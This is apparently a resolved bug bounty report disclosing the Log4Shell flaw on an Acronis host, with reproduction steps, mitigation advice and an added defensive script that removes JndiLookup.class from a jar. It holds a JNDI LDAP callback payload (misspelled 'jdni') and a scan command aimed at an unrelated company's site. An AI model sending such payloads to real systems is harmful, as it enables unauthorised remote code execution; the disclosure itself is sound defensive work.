[CVE-2021-44228] nps.acronis.com is vulnerable to the recent log4shell 0-day

Critical
Acronis
Submitted None
Reported by rhinestonecowboy

Vulnerability Details

Technical details and impact analysis

Deserialization of Untrusted Data
## Summary

The website at nps.acronis.com is vulnerable to CVE-2021-44228

## Steps To Reproduce

I used this [script](https://github.com/fullhunt/log4j-scan) to find this. It spins up an interact-sh server to receive the callback and sends the payload in the query string and about 30 different headers. You can reproduce manually with curl and interact-sh/burp collaborator/a server you control. However, since the callback is proof of the vulnerability, the script makes it easier to identify. Let me know if you want me to tell you which specific header fires the payload and I will test them.

1. Construct the payload: `${jdni:ldap://nps.acronis.com.<your-server>/test}`
2. Inject the payload in the Request Headers (User Agent, X-Forwarded-For etc) or use the script from fullscan: `python3 log4j-scan.py -u 'https://marketingportal.engelvoelkers.com'`
3. Observe the callback, proving the deserialization of untrusted data which leads to rce {F1544482}

## Recommendations

Update log4j to the latest [version](https://logging.apache.org/log4j/2.x/download.html). If updating to the latest version is not possible, the vulnerability can be mitigated by removing the JndiLookup class from the class path. Additionally, the issue can be mitigated on Log4j versions >=2.10 by setting the system property log4j2.formatMsgNoLookups or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable to true.

## Impact

Remote Code Execution (rce)
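The "remove the JndiLookup class" workaround from the Recommendations, as an added defender-side example (not the reporter's script nor Acronis code): it checks whether a log4j-core jar still ships the class and writes a copy with the entry stripped, the same effect as `zip -d` on the jar. The sample jar it builds is a constructed stand-in for log4j-core, not the real artifact.

```python
"""Check for, and strip, JndiLookup.class from a log4j-core jar (example code)."""
import os
import tempfile
import zipfile

# Entry whose removal disables JNDI lookups in log4j-core 2.x (the report's mitigation).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def jar_has_jndi_lookup(jar_path: str) -> bool:
    """True if the jar still contains JndiLookup.class, i.e. the workaround is NOT applied."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def strip_jndi_lookup(src_jar: str, dst_jar: str) -> int:
    """Copy src_jar to dst_jar without JndiLookup.class; return how many entries were dropped.

    Equivalent to: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
    """
    removed = 0
    with zipfile.ZipFile(src_jar) as src, zipfile.ZipFile(dst_jar, "w") as dst:
        for info in src.infolist():
            if info.filename == JNDI_LOOKUP_CLASS:
                removed += 1
                continue  # skip the entry instead of copying it
            dst.writestr(info, src.read(info.filename))
    return removed


def build_sample_jar(path: str, include_lookup: bool = True) -> None:
    """Constructed stand-in for log4j-core: manifest, one class, and optionally JndiLookup.class."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")


def demo() -> tuple:
    """Returns (vulnerable_before, entries_removed, vulnerable_after) for the sample jar."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "log4j-core-sample.jar")
        dst = os.path.join(tmp, "log4j-core-sample-patched.jar")
        build_sample_jar(src)
        before = jar_has_jndi_lookup(src)
        removed = strip_jndi_lookup(src, dst)
        after = jar_has_jndi_lookup(dst)
        return before, removed, after


if __name__ == "__main__":
    print(demo())  # (True, 1, False)
```

Stripping the class only works when the application actually loads the patched jar, so rerun the check against the deployed classpath, not only the build output.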

Related CVEs

Associated Common Vulnerabilities and Exposures

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from …

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1000.00

Submitted

Weakness

Deserialization of Untrusted Data